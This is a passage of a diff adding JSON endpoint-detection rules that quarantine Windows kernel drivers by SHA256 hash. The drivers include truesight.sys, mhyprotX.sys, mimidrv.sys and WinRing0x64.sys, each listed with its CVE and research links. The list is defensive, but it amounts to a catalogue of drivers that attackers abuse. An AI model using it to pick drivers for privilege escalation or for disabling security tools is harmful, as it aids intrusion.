"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980098Z", + "creation_date": "2026-03-23T11:45:29.980100Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980105Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "93d873cdf23d5edc622b74f9544cac7fe247d7a68e1e2a7bf2879fad97a3ae63", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] 
[file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bbe92855-d0b8-598c-aec6-5c24529e370c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.475697Z", + "creation_date": "2026-03-23T11:45:31.475701Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.475711Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ce90d578ca16d80e853080a5bc7daf91130b02ec8a76c73f7d0b66c4a9600ba5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bbf85d81-be35-58e9-ae72-96781c300730", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.457803Z", + "creation_date": "2026-03-23T11:45:30.457806Z", + "enabled": true, + "block_on_agent": true, + 
"quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.457815Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e7b79fe1377b3da749590c080d4d96e59e622b1013b2183b98c81baa8bf2fffe", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bc23c5ab-062c-5d98-85cf-920cb46b7a47", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612146Z", + "creation_date": "2026-03-23T11:45:29.612148Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612154Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "df3fd9fa267e12d7c6b65028373e21978041f0c94375b5c7316498fbad6f4ae0", + "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bc338102-66c0-5989-9b17-42f74e11fded", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613495Z", + "creation_date": "2026-03-23T11:45:29.613497Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613502Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "904d8d0db7b3ed747ecfbb04386dfbe23b71ffd054f32ab17f65bc17d500f730", + "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bc3c1461-a090-5a30-846f-a9eab6d90afe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971309Z", + "creation_date": "2026-03-23T11:45:29.971312Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971320Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ab2632a4d93a7f3b7598c06a9fdc773a1b1b69a7dd926bdb7cf578992628e9dd", + "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bc3e60c7-e00e-5a31-9130-700992144386", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973940Z", + "creation_date": "2026-03-23T11:45:29.973949Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973954Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bcfc2c9883e6c1b8429be44cc4db988a9eecb544988fbd756d18cfca6201876f", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bc3ee6f9-b4aa-5aa1-bc29-cc880402c9d2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982218Z", + "creation_date": "2026-03-23T11:45:29.982220Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982225Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d475c4fe917020d420b5d0cf1f074b1427f49bd1f4414873501be51700f8832d", + "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/b03798af-d25a-400b-9236-4643a802846f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bc53a9ef-7ecd-582e-b27d-29cda1eff782", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835993Z", + "creation_date": "2026-03-23T11:45:30.835995Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836000Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a2a952ae1cb72f017e48e6d382d20765883b3ce2bc5ca15c4da0d07773551aa3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller 
(v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bc56ebfa-7aac-52a9-b34a-524e630fcbfb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461469Z", + "creation_date": "2026-03-23T11:45:30.461472Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461481Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "70b63dfc3ed2b89a4eb8a0aa6c26885f460e5686d21c9d32413df0cdc5f962c7", + "comment": "Vulnerable Kernel Driver (aka netfilterdrv.sys) [https://www.loldrivers.io/drivers/f1dcb0e4-aa53-4e62-ab09-fb7b4a356916/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bc57c00c-40f2-5f3f-b847-711d7f149cdc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976371Z", + "creation_date": 
"2026-03-23T11:45:29.976373Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976378Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7f4555a940ce1156c9bcea9a2a0b801f9a5e44ec9400b61b14a7b1a6404ffdf6", + "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bc788772-cb85-5ca2-bc40-4bd00edceec5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821978Z", + "creation_date": "2026-03-23T11:45:31.821982Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821991Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "214b840974ebc8cd5a2ba581ee1a903712b8c6db0fcc6f5a998cb732c9184b97", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"bc8185cd-125d-59f3-8e9e-9a36cbc3dd46", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153542Z", + "creation_date": "2026-03-23T11:45:31.153544Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153550Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "56ebc84e95e54a28d8bb557ebdbdc89a4e7b9205c653298a0bcc3a0159269a1b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bc81b4c2-3d5c-5ace-8017-52ed6980f453", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830615Z", + "creation_date": "2026-03-23T11:45:30.830617Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.830623Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b8d8cf37f98bb285db5b6abcfe1b25fb0c2b43dc2146dc1714af88fd6ae9cab7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bc89e5a8-6cc1-5ab7-bca9-03d3917f1a27", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617219Z", + "creation_date": "2026-03-23T11:45:29.617221Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617227Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a7b000abbcc344444a9b00cfade7aa22ab92ce0cadec196c30eb1851ae4fa062", + "comment": "Noriyuki MIYAZAKI's WinRing0 dangerous driver (aka WinRing0x64.sys) [CVE-2020-14979] [https://www.loldrivers.io/drivers/f0fd5bc6-9ebd-4eb0-93ce-9256a5b9abf9/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bc8acceb-e8e2-54f1-8063-00f933dbeaa2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969647Z", + "creation_date": "2026-03-23T11:45:29.969649Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969654Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e76d989489c80b5e57b12b0dbfe04063701cb0e1239a9dbe50498978dd5a71ba", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bc928b78-a713-5f4d-a57f-c8b22af44afd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.484359Z", + "creation_date": "2026-03-23T11:45:31.484362Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.484372Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "c36b249512c286e8c26149c44ee703da62698a754413b0cc5a55d42e06b3509f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bc9367bd-aeed-5e97-9bfb-98309337a8b4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499459Z", + "creation_date": "2026-03-23T11:45:31.499462Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499470Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1d47053aa2533e477f86a6848b1ca9b895cf4b3bfb2870d9481be4321b7defbf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bc9d50be-07f3-598a-ab27-9e73c429f93c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.467442Z", + "creation_date": "2026-03-23T11:45:30.467445Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.467454Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2ac415873e0a8638f5154ac4c1713b6f0527119b59706df65a5b3ed73ece02a6", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bca5722f-c83d-5260-bdc0-cd6044901b41", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972681Z", + "creation_date": "2026-03-23T11:45:29.972683Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972689Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5f353fc46843155b6b63e75994f5328b9d4344654d5759a5145cd6e64babe3de", + "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) 
[https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bca66824-c9b5-5edd-80b6-52903e933a6a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615606Z", + "creation_date": "2026-03-23T11:45:29.615608Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615614Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "48ac8ae911c490e1b7f7813c0f345677e110ffaa9ef385b86ca25e5519e2c0de", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bcb3b05b-8299-5fa4-8f9b-bc5e9f4a1e24", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:31.148131Z", + "creation_date": "2026-03-23T11:45:31.148133Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148139Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eafe1af8bd0bf72746a7dac888fab44660b7874e7dc873f3b841534bd4a288b9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bcc3d352-47de-5596-8828-c622a24bc267", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.470640Z", + "creation_date": "2026-03-23T11:45:30.470643Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.470652Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dca34739f3935caed2af248206452e7ba1fdf394c901e74729b5a96884dc6228", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bcc709ac-d8fd-57b9-8ba0-995016e9cb19", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.453912Z", + "creation_date": "2026-03-23T11:45:30.453916Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.453925Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0181d60506b1f3609217487c2c737621d637e1232f243f68c662d045f44d4873", + "comment": "Malicious Kernel Driver (aka 4118b86e490aed091b1a219dba45f332.sys) [https://www.loldrivers.io/drivers/b32d8d7d-0dc2-4d09-a306-8efc4caf1839/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bcc7712a-d3e5-5bb1-941c-d2f950191884", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.462398Z", + "creation_date": "2026-03-23T11:45:30.462402Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
